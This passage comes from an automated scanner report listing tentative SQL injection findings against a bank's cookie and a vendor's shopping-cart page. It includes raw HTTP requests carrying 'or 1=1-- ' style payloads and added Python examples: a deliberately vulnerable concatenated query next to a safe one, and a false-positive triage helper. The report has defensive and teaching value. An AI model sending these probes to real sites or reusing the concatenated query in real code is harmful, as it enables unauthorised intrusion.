Cookie: TLTSID=0391ABCE700010701FF8C9030944B980; TLTUID=0391ABCE700010701FF8C9030944B980; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000; JSESSIONID=0000vr0mC5rbIJQpoNWoUExeyg1:12qtmh0pv; INTL_LANG=en_US; BOA_COM_BT_ELIGIBLE=No

Response 2

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:45:11 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000mYYREZRsbBb_NNikvmGxTA9:12rfueih8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=489039; Expires=Sun, 23 Oct 2011 12:45:10 GMT; Path=/; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/HM_Loader.js" type="
...[SNIP]...

1.31. https://www.bankofamerica.com/ProcessUser.do [TLTSID cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.bankofamerica.com
Path:   /ProcessUser.do

Issue detail

The TLTSID cookie appears to be vulnerable to SQL injection attacks. The payloads 20087571'%20or%201%3d1--%20 and 20087571'%20or%201%3d2--%20 were each appended to the existing TLTSID cookie value. The two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection are prone to false positives, so review the requests and responses manually before treating this as confirmed. In the excerpts below both response bodies are 8843 bytes and the visible differences are confined to the Set-Cookie headers: hp_beta=B is set only in Response 1, and ngen_throttle takes a new value on every response. Strip such volatile headers before comparing the two responses, and repeat the unmodified request at least twice to see how much the page changes on its own.
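Added here as an illustration, not part of the report: what the 1=1 / 1=2 payload pair is designed to detect, run against an in-memory SQLite table. The sessions table, its rows, the two lookup functions and the use of the TLTSID value as a lookup key are all constructed for the example; nothing on this page shows the real ProcessUser.do backend.

```python
# Added example (not part of the XSS.CX / Burp report): what the
# "' or 1=1-- " / "' or 1=2-- " payload pair is designed to detect, shown on
# an in-memory SQLite table. The table, its rows and the lookup functions are
# constructed for the demo; nothing is known about the real ProcessUser.do
# backend.
import sqlite3

# Constructed sample data: a session table keyed by a tracking-cookie value.
SESSIONS = [
    ("0391ABCE700010701FF8C9030944B980", "alice"),
    ("7F2C19E4A0B1C2D3E4F5A6B7C8D9E0F1", "bob"),
]

# The report's payloads, URL-decoded and appended to the original cookie
# value exactly as the scanner sent them.
TRUE_PAYLOAD = "0391ABCE700010701FF8C9030944B98020087571' or 1=1-- "
FALSE_PAYLOAD = "0391ABCE700010701FF8C9030944B98020087571' or 1=2-- "


def _db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE sessions (sid TEXT, user TEXT)")
    con.executemany("INSERT INTO sessions VALUES (?, ?)", SESSIONS)
    return con


def vulnerable_lookup(cookie: str) -> list:
    """String concatenation: the quote in the cookie closes the literal,
    'or 1=1' becomes part of the WHERE clause and '-- ' comments out the
    closing quote the code appended."""
    con = _db()
    sql = "SELECT user FROM sessions WHERE sid = '" + cookie + "'"
    return sorted(row[0] for row in con.execute(sql))


def safe_lookup(cookie: str) -> list:
    """Bound parameter: the whole cookie value is compared as one string."""
    con = _db()
    rows = con.execute("SELECT user FROM sessions WHERE sid = ?", (cookie,))
    return sorted(row[0] for row in rows)


def differential(lookup) -> tuple:
    """The scanner's test: send the 'true' and 'false' variants and report
    whether the results differ, plus both result sets."""
    t, f = lookup(TRUE_PAYLOAD), lookup(FALSE_PAYLOAD)
    return (t != f, t, f)


if __name__ == "__main__":
    print("concatenated :", differential(vulnerable_lookup))
    print("parameterised:", differential(safe_lookup))
```

With concatenation the true payload returns every row and the false payload returns none, which is the divergence the scanner looks for; with a bound parameter both payloads are just a session id that does not exist and the results are identical.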

Request 1

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98020087571'%20or%201%3d1--%20; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response 1 (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:00 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=0000QigP94vPIqNsp2NsEkVjfBu:12rfueh75; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=795; Expires=Sun, 23 Oct 2011 12:44:00 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: hp_beta=B; Expires=Sun, 23 Oct 2011 12:44:00 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:44:00 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="
...[SNIP]...

Request 2

GET /ProcessUser.do?section=onlinebanking_enroll&adlink=000309029q890000g161 HTTP/1.1
Host: www.bankofamerica.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=0391ABCE700010701FF8C9030944B98020087571'%20or%201%3d2--%20; TLTUID=0391ABCE700010701FF8C9030944B980; JSESSIONID=0000IQncNGlie79He7SZqIjFdOC:15bvh5047; BOA_0020=20110426:0:O:6b53285b-42d1-44c7-a12875a0670c1eb1; CONTEXT=en_US; INTL_LANG=en_US; LANG_COOKIE=en_US; cmRS=&t1=1303820608501&t2=-1&t3=1303820634257&lti=1303820634257&ln=&hr=http%3A//www.bankofamerica.com/adtrack/index.cgi%3Fadlink%3D000309029q890000g161&fti=&fn=&ac=&fd=&uer=&fu=&pi=&ho=testdata.coremetrics.com/cm%3F&ci=60010394; TRACKING_CODE=000309029q890000g161; PROMO=000309029q890000g161; BIGipServerngen-www.80=960935595.20480.0000

Response 2 (redirected)

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Tue, 26 Apr 2011 12:44:02 GMT
Content-type: text/html;charset=ISO-8859-1
Content-language: en-US
Set-cookie: JSESSIONID=00002IQdPdK7ZBchgsxaS14rwpi:12rfuebu8; Path=/; Secure
Set-cookie: INTL_LANG=en_US
Set-cookie: ngen_throttle=288187; Expires=Sun, 23 Oct 2011 12:44:01 GMT; Path=/; Domain=.bankofamerica.com
Set-cookie: BOA_COM_BT_ELIGIBLE=No; Expires=Tue, 03 May 2011 12:44:01 GMT; Domain=.bankofamerica.com
Expires: Thu, 01 Dec 1994 16:00:00 GMT
Cache-control: no-cache="set-cookie, set-cookie2"
Content-Length: 8843

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en_US">
   <head>
       <meta http-equiv="content-type" content="text/html; charset=iso-8859-1">
       <meta name="Description" content="Bank of America works hand-in-hand with you to safeguard your banking experience.">
       <meta name="keywords" content="Privacy, privacy practices, privacy preferences, private, confidentiality, protect, protection, secure, security, opt in, opt out, opt-in, opt-out, safeguard, sharing, secure socket layer, SSL, cookie, cookies, password, passwords, online privacy, email, e-mail, security, identity theft, fraud, privacy policy, privacy and security, privacy &security, overview, privacy policies, online banking, online statements, statements, estatements, e-statements, prevention, detection, resolution, report, ID theft, tips">
       <title>Bank of America | Home | Personal</title>

       
<link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/masthead-ns6.css" type="text/css">
<link rel="stylesheet" href="/www/en_US/global/hs_home/stylesheets/home_win_ns6.css" type="text/css">


       <link rel="stylesheet" href="/www/en_US/global/mvc_objects/stylesheet/hs_overview_cc.css" type="text/css">    
       <script language="JavaScript" src="/www/en_US/global/js/masthead.js" type="text/javascript"></script>
       <script language="JavaScript" src="/www/en_US/global/js/mvc-js-utils.js" type="text/javascript"></script>
       <script language="JavaScript1.2" src="/www/en_US/global/mvc_objects/flyout/BofA_keyboard_navigation.js" type="text/javascript"></scr
...[SNIP]...

1.32. http://www.clone-systems.com/ecommerce/cart.php [CMSSESSIDe4d04fcf cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The CMSSESSIDe4d04fcf cookie appears to be vulnerable to SQL injection attacks. The payloads 34446388'%20or%201%3d1--%20 and 34446388'%20or%201%3d2--%20 were each appended to the existing CMSSESSIDe4d04fcf cookie value. The two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection are prone to false positives, so review the requests and responses manually before treating this as confirmed. Here the responses differ in length (42635 versus 42568 bytes): Response 1 links back to "PCI ASV Scanning Services", the category named in the Referer, while Response 2 links to the plain "keep shopping" page and lists a second suggested product. The same pair of differences appears in 1.33 with the session cookie left unmodified, so it is consistent with content that depends on session state rather than on the payload. Compare against two unmodified repeats of the request before relying on this result.

Request 1

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d1--%20

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:02:05 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                
...[SNIP]...

Request 2

GET /ecommerce/cart.php?suggest=0 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj6334446388'%20or%201%3d2--%20

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:02:06 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                            <li class="Even">
                               <div class="ProductImage">
                                   <a
...[SNIP]...

1.33. http://www.clone-systems.com/ecommerce/cart.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.clone-systems.com
Path:   /ecommerce/cart.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted as part of the name of an arbitrarily supplied request parameter (1'%20and%201%3d1--%20=1 and 1'%20and%201%3d2--%20=1). The two requests produced different responses, which the scanner interprets as the input being incorporated into a SQL query in an unsafe way.

Automated difference-based tests for SQL injection are prone to false positives, so review the requests and responses manually before treating this as confirmed. The session cookie is unmodified in both requests, and the responses differ in exactly the way they do in 1.32 (the category link and the suggested-product list), which points to state-dependent page content rather than the parameter name reaching a query. Applications rarely use a parameter name, as opposed to its value, in SQL, so this instance deserves extra scepticism.
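Added triage helper for difference-based findings like 1.31 to 1.33 (example code, not from the report or the scanner): it strips volatile material from each response (Set-Cookie, Date, Expires and Content-Length headers, plus long session-like tokens in the body), measures how much two unmodified baseline requests already differ, and flags the finding only when the true/false payload pair differs by more than that. The sample responses are constructed to mimic the three situations on this page and are not the captured traffic.

```python
# Added example (not part of the XSS.CX / Burp report): a triage check for
# difference-based SQL injection findings like 1.31 to 1.33. It removes
# volatile material from each response (Set-Cookie, Date, Expires,
# Content-Length headers and long session-like tokens in the body), measures
# how much two *unmodified* baseline requests already differ, and flags the
# finding only when the true/false payload pair differs by more than that.
# The responses below are constructed to mimic the three cases in this
# report; they are not the captured traffic.
import difflib
import re

VOLATILE_HEADERS = ("set-cookie", "date", "expires", "content-length")
TOKEN_RE = re.compile(r"[0-9A-Za-z_:\-]{24,}")   # JSESSIONID-style values


def normalise(raw: str) -> str:
    """Drop headers that change on every response and mask long tokens."""
    head, _, body = raw.partition("\n\n")
    headers = [h for h in head.splitlines()
               if not h.lower().startswith(VOLATILE_HEADERS)]
    return "\n".join(headers) + "\n\n" + TOKEN_RE.sub("<tok>", body)


def similarity(a: str, b: str) -> float:
    return difflib.SequenceMatcher(None, normalise(a), normalise(b)).ratio()


def looks_injectable(baseline_a: str, baseline_b: str,
                     true_resp: str, false_resp: str,
                     margin: float = 0.02) -> bool:
    """True only if the payload pair diverges more than the page does by
    itself between two identical requests."""
    noise = 1.0 - similarity(baseline_a, baseline_b)
    delta = 1.0 - similarity(true_resp, false_resp)
    return delta > noise + margin


def _resp(extra_headers: str, body: str) -> str:
    """Build a constructed HTTP response text for the demo."""
    return ("HTTP/1.1 200 OK\nServer: demo\n" + extra_headers
            + ("Content-Length: %d\n\n" % len(body)) + body)


HOMEPAGE = "<html><title>Home | Personal</title><p>Welcome</p></html>"
CART_WITH_CAT = '<a href="/cat/PCI-ASV/">Keep shopping in PCI ASV Scanning Services</a>'
CART_PLAIN = '<a href="/">Keep shopping</a>'

# Each case: (baseline 1, baseline 2, 'true' payload response, 'false' payload response)
CASES = {
    # 1.31-style: identical bodies, only cookies and timestamps differ.
    "cookie_noise": (
        _resp("Date: 12:44:00\nSet-Cookie: ngen_throttle=795\nSet-Cookie: hp_beta=B\n", HOMEPAGE),
        _resp("Date: 12:44:02\nSet-Cookie: ngen_throttle=288187\n", HOMEPAGE),
        _resp("Date: 12:45:10\nSet-Cookie: ngen_throttle=303\nSet-Cookie: hp_beta=B\n", HOMEPAGE),
        _resp("Date: 12:45:11\nSet-Cookie: ngen_throttle=489039\n", HOMEPAGE),
    ),
    # 1.32/1.33-style: stateful page, so even the unmodified repeats differ.
    "stateful_noise": (
        _resp("", CART_WITH_CAT), _resp("", CART_PLAIN),
        _resp("", CART_WITH_CAT), _resp("", CART_PLAIN),
    ),
    # Stable baseline and a payload pair that actually changes the content.
    "real_difference": (
        _resp("", HOMEPAGE), _resp("", HOMEPAGE),
        _resp("", "<p>Welcome back, alice</p>"),
        _resp("", "<p>Session not found</p>"),
    ),
}


def triage() -> dict:
    """Verdict per constructed case: True means worth manual follow-up."""
    return {name: looks_injectable(*case) for name, case in CASES.items()}


if __name__ == "__main__":
    for name, verdict in triage().items():
        print("%-16s %s" % (name, "FLAG" if verdict else "noise"))
```

The margin keeps the check from firing on rounding-level differences; raise it for pages with rotating content, and always send the baseline pair from the same session and in the same order as the payload pair so that session state is consumed identically.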

Request 1

GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d1--%20=1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response 1

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42635

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/">Click here to keep shopping in PCI ASV Scanning Services</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
                               <div class="ProductDetails">
                                   <strong><a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" class="">PCI Scan for a single website</a></strong>
                               </div>
                               <div class="ProductPriceRating">
                                   <em><strike>$129.95</strike> $94.95</em>
                                   <span class="Rating Rating0"><img src="http://www.clone-systems.com/ecommerce/templates/CLONETEMPLATEII/images/IcoRating0.gif" alt="" style="" /></span>
                               </div>
                               <div class="ProductCompareButton" style="display:none">
                                   <input type="checkbox" class="CheckBox" name="compare_product_ids" id="compare_2" value="2" onclick="product_comparison_box_changed(this.checked)" /> <label for="compare_2">Compare</label> <br />
                               </div>
                               <div class="ProductActionAdd" style="display:;">
                                   <a href="http://www.clone-systems.com/ecommerce/cart.php?action=add&amp;product_id=2">Add To Cart</a>
                               </div>
                           </li>                
...[SNIP]...

Request 2

GET /ecommerce/cart.php?suggest=0&1'%20and%201%3d2--%20=1 HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
Referer: http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SHOP_SESSION_TOKEN=ledng76mlqmvtdngb8nt64bh55; STORE_VISITOR=1; RECENTLY_VIEWED_PRODUCTS=8; CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response 2

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 00:03:27 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 42568

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...
<a href="http://www.clone-systems.com/ecommerce">Click here to keep shopping</a>
       </div>

       <div style="display: none">
           <p class="InfoMessage">
               <strong>There are no products in your cart.</strong>
           </p>
           To add a product to your cart, first browse for it or use the search box and then click its &quot;Add to Cart&quot; button.
           <br /><br />
           <a href="http://www.clone-systems.com/ecommerce/">Continue Shopping</a> on the Clone Systems, Inc. home page.
       </div>
   </div>
</div>
           <div class="Block Moveable Panel" id="SuggestiveCartContent" style="">
   <div class="BlockContent">
       <h2>You May Also Like...</h2>
       <p>We found some products that you might also be interested in.</p>
       <ul class="ProductList">
                                       <li class="Odd">
                               <div class="ProductImage">
                                   <a href="http://www.clone-systems.com/ecommerce/products/PCI-Scan-for-a-single-website.html" ><img src="http://www.clone-systems.com/ecommerce/product_images/n/575/IPCI-01__87161_thumb.png" alt="" /></a>
                               </div>
